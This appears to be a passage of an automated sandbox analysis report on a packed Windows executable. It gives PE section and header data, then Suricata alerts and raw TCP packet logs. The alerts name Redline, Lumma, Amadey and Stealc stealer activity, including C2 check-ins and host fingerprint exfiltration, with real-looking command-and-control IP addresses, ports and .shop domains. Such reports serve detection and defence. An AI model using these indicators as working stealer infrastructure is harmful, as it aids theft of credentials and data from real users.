IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b6e78	0x18	ogvicfhk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	04ba8a33b8a932a2cbbab3b53f40ab5d	False	0.9975200102179836	data	7.983930820608206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	d0f436a6f89b2fb6472ba12add03a31c	False	0.580078125	data	4.528962819230445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ad000	0x200	e386ccf441188f243220a063ae50bb68	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ogvicfhk	0x318000	0x1a0000	0x19f200	ed68216ae7fca026d7f4e649c9b768e2	False	0.9941623852002409	data	7.953631233821215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
behzrsjn	0x4b8000	0x1000	0x600	de8c5098c343e9810c764d77f8074fef	False	0.5885416666666666	data	5.119929794366606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b9000	0x3000	0x2200	c7f8e81261e539dc8680672f07ad5162	False	0.03917738970588235	DOS executable (COM)	0.3968424069533904	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b6ed8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-31T15:44:22.067692+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:07.049102+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49714	80	192.168.2.5	185.215.113.16
2024-08-31T15:45:00.879634+0200	UDP	2055477	ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)	1	61294	53	192.168.2.5	1.1.1.1
2024-08-31T15:44:13.484903+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:45:09.476110+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49769	443	192.168.2.5	188.114.97.3
2024-08-31T15:45:09.476110+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49769	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:19.892744+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:11.876188+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	45580	49721	65.21.18.51	192.168.2.5
2024-08-31T15:44:17.259592+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:19.150122+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:13.771836+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49722	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:16.304102+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49727	80	192.168.2.5	52.212.52.84
2024-08-31T15:44:20.314267+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:35.529672+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49735	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:13.815893+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	26212	49715	95.179.250.45	192.168.2.5
2024-08-31T15:44:14.481498+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:18.419367+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:09.653335+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49716	80	192.168.2.5	185.215.113.16
2024-08-31T15:45:01.487822+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49755	443	192.168.2.5	188.114.96.3
2024-08-31T15:44:54.795044+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49743	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:18.682229+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:56.783797+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49744	185.215.113.19	192.168.2.5
2024-08-31T15:44:16.922485+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:16.242885+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:15.662378+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49725	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:38.980248+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49739	80	192.168.2.5	52.212.52.84
2024-08-31T15:44:21.352988+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:37.577906+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49737	443	192.168.2.5	69.57.172.44
2024-08-31T15:44:13.528781+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49722	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:16.512993+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49724	185.215.113.17	192.168.2.5
2024-08-31T15:44:34.922409+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49732	80	192.168.2.5	52.212.52.84
2024-08-31T15:45:02.618563+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49755	443	192.168.2.5	188.114.96.3
2024-08-31T15:45:02.618563+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49755	443	192.168.2.5	188.114.96.3
2024-08-31T15:44:14.686467+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:17.924004+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:04.047738+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49712	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:17.681043+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:17.267791+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45580	49721	65.21.18.51	192.168.2.5
2024-08-31T15:45:13.662321+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49779	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:17.415469+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:52.097936+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49741	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:15.882815+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:20.085498+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:18.131625+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:45:08.961542+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49769	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:08.437429+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	26212	49715	95.179.250.45	192.168.2.5
2024-08-31T15:44:34.124673+0200	UDP	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	55125	53	192.168.2.5	1.1.1.1
2024-08-31T15:45:03.117048+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49760	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:19.463266+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:20.124433+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:10.961103+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49717	80	192.168.2.5	185.215.113.26
2024-08-31T15:44:17.340391+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49724	185.215.113.17	192.168.2.5
2024-08-31T15:44:34.609653+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49733	443	192.168.2.5	188.114.96.3
2024-08-31T15:44:35.404954+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:15.695580+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:14.192726+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:22.799350+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:18.903245+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:35.025912+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49733	443	192.168.2.5	188.114.96.3
2024-08-31T15:44:35.025912+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49733	443	192.168.2.5	188.114.96.3
2024-08-31T15:44:21.144465+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:11.669348+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:11.669348+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:33.772607+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49730	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:15.200447+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:16.760096+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:19.711350+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:19.249564+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:31.659454+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:17.001521+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:35.678531+0200	TCP	2044623	ET MALWARE Amadey Bot Activity (POST)	1	49734	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:36.842803+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49736	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:36.842803+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49736	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:17.469723+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:35.035718+0200	UDP	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	57972	53	192.168.2.5	1.1.1.1
2024-08-31T15:44:05.008880+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49713	80	192.168.2.5	52.212.52.84
2024-08-31T15:44:17.225185+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:24.619801+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49729	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:53.239933+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49741	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:38.358770+0200	TCP	2044623	ET MALWARE Amadey Bot Activity (POST)	1	49738	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:06.807798+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49714	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:14.003489+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:22.486824+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:35.662639+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49735	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:35.662639+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49735	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:48.916720+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49740	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:19.525335+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:17.694085+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:56.288928+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49747	80	192.168.2.5	194.58.114.223
2024-08-31T15:45:03.063415+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49758	80	192.168.2.5	185.215.113.19
2024-08-31T15:45:10.348700+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49772	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:19.899025+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:32.848488+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:45:06.228728+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49766	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:19.674480+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:45:11.958854+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49775	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:13.811040+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:08.253213+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:08.253213+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:20.822289+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:54.794194+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49745	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:06.066742+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49712	185.215.113.16	192.168.2.5
2024-08-31T15:44:35.832677+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:18.637700+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:57.101399+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49750	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:18.862016+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:33.580054+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:45:06.383204+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49765	443	192.168.2.5	104.21.21.16
2024-08-31T15:44:17.699313+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:18.143308+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:45:03.257814+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49760	443	192.168.2.5	188.114.97.3
2024-08-31T15:45:03.257814+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49760	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:24.195303+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49729	80	192.168.2.5	185.215.113.16
2024-08-31T15:45:11.818702+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49777	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:17.020395+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:19.339385+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45
2024-08-31T15:44:33.953102+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49731	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:33.953102+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49731	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:36.202490+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49736	443	192.168.2.5	188.114.97.3
2024-08-31T15:44:22.279526+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49721	45580	192.168.2.5	65.21.18.51
2024-08-31T15:44:29.068952+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:48.671815+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49740	80	192.168.2.5	185.215.113.16
2024-08-31T15:44:59.890009+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49753	80	192.168.2.5	185.215.113.19
2024-08-31T15:44:16.506266+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49724	80	192.168.2.5	185.215.113.17
2024-08-31T15:44:14.879173+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49715	26212	192.168.2.5	95.179.250.45

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 15:44:03.181349993 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:03.186264992 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:03.186364889 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:03.186487913 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:03.191246033 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:04.047657013 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:04.047738075 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:04.049952984 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:04.054735899 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:04.327761889 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:04.327775955 CEST	80	49712	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:04.327862024 CEST	49712	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:04.375463963 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:04.380331993 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:04.383209944 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:04.383390903 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:04.388449907 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.008780003 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.008879900 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.043675900 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043689013 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043699980 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043781996 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.043829918 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043848991 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043859959 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043869019 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043880939 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043891907 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.043911934 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.043960094 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.044509888 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.044698954 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.044871092 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.048675060 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.050595045 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.134787083 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.134799004 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.134809971 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.134818077 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.134834051 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.134864092 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.134931087 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.135067940 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.135087013 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.135097027 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.135113955 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.135145903 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.135200024 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.135215998 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.135248899 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.135276079 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.136090040 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136101007 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136111975 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136149883 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.136174917 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.136323929 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136374950 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.136699915 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136709929 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136719942 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.136751890 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.136779070 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.137049913 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137061119 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137100935 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.137666941 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137677908 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137687922 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137722969 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.137733936 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.137746096 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.137795925 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.139730930 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.139808893 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.225944042 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226048946 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226100922 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226113081 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226124048 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226133108 CEST	80	49713	52.212.52.84	192.168.2.5
